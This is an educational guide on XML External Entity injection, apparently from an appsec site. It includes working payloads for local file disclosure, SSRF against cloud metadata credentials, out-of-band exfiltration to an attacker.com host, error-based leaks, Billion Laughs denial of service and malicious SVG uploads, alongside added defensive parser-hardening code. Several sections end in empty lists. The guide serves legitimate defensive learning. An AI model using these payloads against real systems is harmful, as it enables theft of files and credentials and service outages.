appsec.fyi


XXE: A Practical Guide

Curated and synthesized by . Last updated 2026-06-29. Synthesized from 86 of 86 curated resources.

The Persistent Threat of XML External Entity (XXE) Injection

XML External Entity (XXE) injection remains a significant application security threat despite having been known for many years. It persists largely because of how XML parsers are designed and because the configuration needed to process XML safely is complex and often overlooked. This guide provides a deep dive into XXE for experienced application security professionals, covering its mechanics, exploitation techniques, detection, and mitigation strategies.

Core Mechanics of XXE

At its heart, XXE injection exploits how XML parsers process external entities. XML allows for the definition of entities, which are essentially placeholders for content that can be fetched from various sources, including local files and remote URLs. When an XML parser encounters an external entity declaration and is configured to resolve it, it dereferences the specified URI, potentially embedding the retrieved content into the XML document.

The core vulnerability arises when an application accepts untrusted XML input and its XML parser is not configured to disable or restrict the processing of external entities and Document Type Definitions (DTDs). This allows an attacker to craft malicious XML payloads that reference external resources, thereby forcing the vulnerable application to fetch and process content that should remain inaccessible.

The XML specification defines entities that can access local or remote content via a system identifier [1][2]. An external entity can be defined within the XML document itself or, more commonly, via an external DTD. When an XML processor encounters such an entity, it resolves the system identifier. If this identifier points to a local file (e.g., file:///etc/passwd), the parser might include the file's contents in the XML output [3][4]. Similarly, it can reference URLs, leading to Server-Side Request Forgery (SSRF) [5][6].

The critical issue often stems from the default configurations of XML parsers in various programming languages and libraries, which may have features like DTD loading and external entity resolution enabled by default [7][8].

Notable Techniques and Attack Vectors

XXE attacks manifest in several forms, each with distinct impacts:

File Disclosure

This is the most straightforward XXE attack, where an attacker crafts an XML payload that references a local file. The parser then fetches the file's content and, if the application reflects this parsed content back to the user, the attacker gains direct access to sensitive information.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>

This payload aims to read the /etc/passwd file, a common target for demonstrating file disclosure [5][4][1]. Attackers often target configuration files, credentials, or system-sensitive files.

Server-Side Request Forgery (SSRF)

XXE can be weaponized to force the vulnerable server to make arbitrary HTTP requests to internal or external resources. This allows attackers to probe internal networks, interact with internal APIs, or access cloud metadata endpoints.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&ssrf;</data>

This example targets the AWS EC2 metadata service, a common SSRF vector to steal cloud credentials [5][9][10].

Blind XXE and Out-of-Band (OOB) Exfiltration

In blind XXE scenarios, the application may be vulnerable, but it doesn't directly reflect the entity's content in the response. Attackers use out-of-band techniques to exfiltrate data. This typically involves leveraging external DTDs hosted on an attacker-controlled server to trigger HTTP requests or DNS lookups containing the sensitive data.

An attacker can host a malicious DTD file (e.g., evil.dtd) on their server:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;

The main XML payload would then reference this DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<data>&xxe;</data>

The contents of /etc/hostname are then sent to attacker.com via an HTTP request [11][12][13][14].

Error-Based XXE

Similar to blind XXE, this technique triggers an XML parsing error whose message inadvertently reveals sensitive data. The attacker crafts a payload that builds the path of a non-existent resource from a file's contents, so the resulting "not found" error message includes that data.

A malicious DTD might contain:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

When processed, the parser may raise an error such as FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash, revealing the file's contents in the error message [13][15].

Resource Exhaustion (Denial of Service)

The "Billion Laughs" attack exploits recursive entity expansion to consume excessive memory and processing power, potentially leading to a Denial of Service (DoS) [5][4][2].

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>

Exploiting File Uploads (SVG, DOCX, XLSX)

Many file formats, such as SVG, DOCX, XLSX, and ODT, are XML-based or contain XML components. Applications that process these files for content extraction or rendering can be vulnerable to XXE if the XML parser is not secured [16][7][17][18][19].

For example, a malicious SVG file can contain an XXE payload to reveal file contents when rendered:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

When processed, the hostname might be displayed within the SVG image itself [5][20][6]. Tools like Docem and oxml_xxe automate the embedding of XXE payloads into these document formats [21][22][23][24][19].
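The defender's counterpart to the file-upload vector above is to inspect uploaded documents before any XML parser sees them. The following is an added example, not code from the guide or from the tools it names (Docem, oxml_xxe): it opens an OOXML-style archive (DOCX/XLSX/PPTX are zip files whose parts are XML) and refuses the upload if any XML part, or a stand-alone SVG, carries a DOCTYPE, which is the only place entity declarations can live. The function names, the `.xml`/`.rels` part suffixes, the size cap and the sample archive are assumptions constructed for the example.

```python
"""Added example (not from the appsec.fyi guide): pre-parse scanning of
OOXML-style archives and SVG uploads for DOCTYPE declarations."""
import io
import zipfile
import xml.parsers.expat as expat

# Hypothetical policy values: parts the document consumer will hand to an XML
# parser, and a cap so an oversized part is refused rather than inflated.
XML_PART_SUFFIXES = (".xml", ".rels")
MAX_PART_BYTES = 10 * 1024 * 1024


class _DoctypeSeen(Exception):
    """Internal signal that stops expat at the first DOCTYPE."""


def has_doctype(xml_bytes: bytes) -> bool:
    """True if the document carries a DOCTYPE (or is malformed: refuse on doubt).

    Parsing stops at the DOCTYPE itself, so a recursive-entity DTD is never
    expanded while the check runs.
    """
    parser = expat.ParserCreate()

    def stop_at_doctype(name, system_id, public_id, has_internal_subset):
        raise _DoctypeSeen(name)

    parser.StartDoctypeDeclHandler = stop_at_doctype
    try:
        parser.Parse(xml_bytes, True)
    except (_DoctypeSeen, expat.ExpatError):
        return True
    return False


def find_unsafe_parts(archive_bytes: bytes) -> list:
    """Names of XML parts in an OOXML-style zip that carry a DOCTYPE or exceed the size cap."""
    unsafe = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith(XML_PART_SUFFIXES):
                continue
            if info.file_size > MAX_PART_BYTES or has_doctype(archive.read(info.filename)):
                unsafe.append(info.filename)
    return unsafe


def build_sample_docx(poisoned: bool) -> bytes:
    """Constructed minimal DOCX-like archive (not produced by Word).

    With poisoned=True the document part gets an entity declaration modelled on
    the guide's hostname-reading SVG payload.
    """
    body = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>')
    if poisoned:
        body = ('<!DOCTYPE x [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>'
                + body.replace("hello", "&xxe;"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml",
                         '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        archive.writestr("word/document.xml", '<?xml version="1.0"?>' + body)
    return buf.getvalue()


# Constructed SVG samples: the guide's hostname-reading SVG and a harmless icon.
POISONED_SVG = b"""<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>"""
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8"><rect width="8" height="8"/></svg>'

if __name__ == "__main__":
    print("clean docx    :", find_unsafe_parts(build_sample_docx(False)))
    print("poisoned docx :", find_unsafe_parts(build_sample_docx(True)))
    print("poisoned svg  :", has_doctype(POISONED_SVG), "| clean svg:", has_doctype(CLEAN_SVG))
```

Refusing any DOCTYPE is deliberately blunt: legitimate office documents and SVG icons produced by mainstream tools do not carry one, so the check costs nothing in practice and does not depend on knowing which parser the downstream library uses or how it is configured.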

Exploiting Protocols and Wrappers

Depending on the underlying XML parser and language runtime (e.g., Java, PHP), attackers can leverage various protocols beyond file:// and http://. PHP's php://filter wrapper, for instance, can be used to encode file contents (e.g., Base64) to bypass character restrictions or to read PHP source code [25][26][27][28][29]. Older Java versions might support protocols like gopher://, ldap://, jar://, allowing for more diverse interactions [30][31][32].

The expect:// wrapper in PHP can be particularly dangerous, allowing for remote command execution if available on the server [25][26][27][14].

Detection and Prevention

Preventing XXE vulnerabilities hinges on securely configuring XML parsers and sanitizing input. The most effective methods involve disabling features that enable external entity processing.

Secure XML Parsing Configuration

The primary defense is to disable the processing of DTDs and external entities altogether. Most modern XML parsers offer features to achieve this:

It is crucial to apply these configurations consistently across all XML parsing operations, especially when dealing with untrusted input [4][1].
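As a concrete illustration of both the entity mechanics described under Core Mechanics and the parser hardening this section calls for, here is an added example (not code from the guide or from any library it cites) written against Python's standard-library expat bindings: the parser refuses any DOCTYPE, entity declaration or external entity reference inside its callbacks, so the file://, http:// and recursive-entity payloads shown earlier are stopped before an entity is ever declared, let alone expanded or dereferenced. The function names, the flat path-to-text result shape and the benign sample document are assumptions made for the example; the attack payloads are the guide's own.

```python
"""Added example (not from the appsec.fyi guide): a standard-library XML parser
that refuses DTD constructs in untrusted input instead of relying on per-library
defaults for entity resolution."""
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DTD, an entity declaration or an external reference."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse untrusted XML into a flat {element_path: text} map, rejecting DTD constructs.

    Rejection happens inside the expat callbacks, so parsing stops at the
    DOCTYPE before the internal subset is even read.
    """
    parser = expat.ParserCreate()

    def refuse_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE declaration refused (root element {name!r})")

    def refuse_entity(name, is_parameter, value, base, system_id, public_id, notation):
        # Defence in depth: not reachable once the DOCTYPE itself is refused.
        raise UnsafeXMLError(f"entity declaration refused ({name!r})")

    def refuse_external(context, base, system_id, public_id):
        # Returning 0 makes expat abort rather than fetch the referenced resource.
        return 0

    parser.StartDoctypeDeclHandler = refuse_doctype
    parser.EntityDeclHandler = refuse_entity
    parser.ExternalEntityRefHandler = refuse_external

    result = {}
    path = []

    def start_element(tag, attrs):
        path.append(tag)
        result.setdefault("/".join(path), "")

    def end_element(tag):
        path.pop()

    def character_data(text):
        key = "/".join(path)
        result[key] = result.get(key, "") + text

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = character_data
    parser.Parse(data, True)
    return {key: value.strip() for key, value in result.items()}


def classify(data: bytes) -> str:
    """Return 'accepted', 'refused-dtd' or 'malformed' for a piece of untrusted XML."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return "refused-dtd"
    except expat.ExpatError:
        return "malformed"
    return "accepted"


# Constructed inputs: the guide's file-disclosure and billion-laughs payloads
# plus one benign document of the kind an API endpoint would actually accept.
FILE_DISCLOSURE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""

BILLION_LAUGHS = b"""<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""

BENIGN = b'<?xml version="1.0"?><order><id>42</id><note>no DTD here</note></order>'

if __name__ == "__main__":
    for label, doc in (("file disclosure", FILE_DISCLOSURE),
                       ("billion laughs", BILLION_LAUGHS),
                       ("benign", BENIGN)):
        print(f"{label:16s} -> {classify(doc)}")
```

Refusing the DOCTYPE up front is what makes the policy independent of library and version defaults, which is exactly where XXE bugs usually come from. If you use lxml instead, the equivalent is to construct `etree.XMLParser` with `resolve_entities=False` and `no_network=True` and to reuse that parser object for every parse of untrusted input; whichever library you use, the parse of an uploaded document, a SOAP body and a webhook payload must all go through the same hardened path.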

Input Validation and Sanitization

While not a foolproof primary defense against XXE (as the core issue lies in parser configuration), input validation can act as a supplementary layer. This involves:

Relying solely on input validation or sanitization to prevent XXE is inadvisable [34].

Web Application Firewalls (WAFs)

WAFs can provide an additional layer of defense by detecting and blocking known XXE patterns in traffic. However, WAFs are susceptible to bypass techniques and should not be considered the primary security control [2].

Dependency Management

Regularly updating XML parsing libraries and frameworks is essential, as vulnerabilities are often patched in newer versions. Failing to manage dependencies can leave applications exposed to known XXE flaws in older, vulnerable libraries [7][17].

Tooling for XXE Analysis

Several tools can assist in discovering and exploiting XXE vulnerabilities:

Recent Developments and Trends

XXE continues to be a prevalent vulnerability, with new instances discovered regularly in various software products:

The trend shows that attackers continue to find and exploit XXE, often by chaining it with other vulnerabilities or using sophisticated bypass techniques.

Where to Go Deeper

For those wishing to expand their knowledge and practical skills in XXE exploitation, the following resources are highly recommended:

Sources cited in this guide

  1. XML External Entity (XXE) Processing | OWASP — owasp.org
  2. XXE Complete Guide: Impact, Examples, and Prevention — hackerone.com
  3. XXE Injection in langchain-community (CVE-2025-6984) — security.snyk.io
  4. XML External Entity - GeeksforGeeks — geeksforgeeks.org
  5. XXE Vulnerability Guide 2025: How XML Attacks Still Threaten — instatunnel.my
  6. XML External Entity (XXE) Attack Guide | Hackviser — hackviser.com
  7. XML External Entity: The Ultimate Bug Bounty Guide to XXE | YesWeHack — yeswehack.com
  8. XML External Entity Prevention · OWASP Cheat Sheet Series — cheatsheetseries.owasp.org
  9. Exploiting XXE for SSRF. Retrieving IAM credentials of EC2… | by Gupta Bles — medium.com
  10. 11.2 Lab: Exploiting XXE to perform SSRF attacks | 2023 — cyberw1ng.medium.com
  11. Exploiting Blind XXE: Data Exfiltration Through External DTD — medium.com
  12. Blind XXE: Exfiltrating Data Out-of-Band in 2025 — instatunnel.my
  13. What is a Blind XXE Attack? | PortSwigger — portswigger.net
  14. XXExploiter — github.com
  15. From blind XXE to root-level file read access – Honoki — honoki.net
  16. Exploiting XXE via File Uploads (SVG, XLSX, DOCX) — exploit-db.com
  17. 10 Types of Web Vulnerabilities that are Often Missed - Detectify Labs — labs.detectify.com
  18. XXE attacks 😈 — link.medium.com
  19. BuffaloWill/oxml_xxe: A tool for embedding XXE/XML exploits into different — github.com
  20. PortSwigger XXE Injection Writeups — g4nd1v.github.io
  21. XXElixir: Tool for Testing XXE via XLSX File Upload Poisoning — github.com
  22. https://www.hahwul.com/2019/09/28/oxml-xxe-payload-inject-tool-docem/ — hahwul.com
  23. GitHub - whitel1st/docem: A tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids) — github.com
  24. If you find powerful OXML XXE tool? it’s “DOCEM” — hahwul.com
  25. Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE — github.com
  26. Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE — github.com
  27. Comprehensive Guide to XXE Exploitation: Advanced Data Exfiltration and RCE — nullsecurityx.codes
  28. XXE - XEE - XML External Entity - HackTricks — book.hacktricks.xyz
  29. https://portswigger.net/web-security/xxe — portswigger.net
  30. XXE - Things Are Getting Out of Band — blog.zsec.uk
  31. https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/ — hackingarticles.in
  32. XXE - Things Are Getting Out of Band — blog.zsec.uk
  33. CVE-2025-27136: LocalS3 CreateBucketConfiguration XXE Injection — offsec.com
  34. Out-of-Band XML External Entity (OOB XXE) — invicti.com
  35. https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html — noob.ninja
  36. Critical Apache Tika Vulnerability Leads to XXE Injection — securityweek.com
  37. CVE-2025-66516: Detecting and Defending Against Apache Tika XXE — akamai.com
  38. Critical Apache Tika CVE-2025-66516: XXE Vulnerability — rescana.com
  39. CVE-2025-30220: GeoServer WFS Service XML External Entity — miggo.io
  40. XXE in GeoServer WFS Service (CVE-2025-30220) — kudelskisecurity.com
  41. Cisco ISE XXE Information Disclosure — sec.cloudapps.cisco.com
  42. CVE-2025-54254: Adobe Experience Manager Forms XXE Vulnerability — sentinelone.com
  43. Rapid7 Analysis: CVE-2022-28219 — rapid7.com
  44. IBM Business Automation Workflow XXE (CVE-2025-13096) — ibm.com
  45. CVE-2025-49493: XXE in Akamai CloudTest — xbow.com
  46. CVE-2025-11035: Jinher OA XXE Vulnerability — sentinelone.com
  47. Pre-auth XXE → HTTP SSRF on ArubaOS 8.13.2 closed as "theoretical / no valid PoC" despite TCP pcap, sshd localhost log, and internal port scan — documenting for community review — netacoding.com
  48. Top HackerOne XXE Reports — github.com
  49. Top 25 XXE Bug Bounty Reports — corneacristian.medium.com
  50. Blind XXE Attacks: Out of Band Interaction Techniques to Exfiltrate Data — shreyapohekar.com
  51. XXE Injection: Advanced Exploitation Guide — intigriti.com
  52. https://gosecure.github.io/xxe-workshop/#0 — gosecure.github.io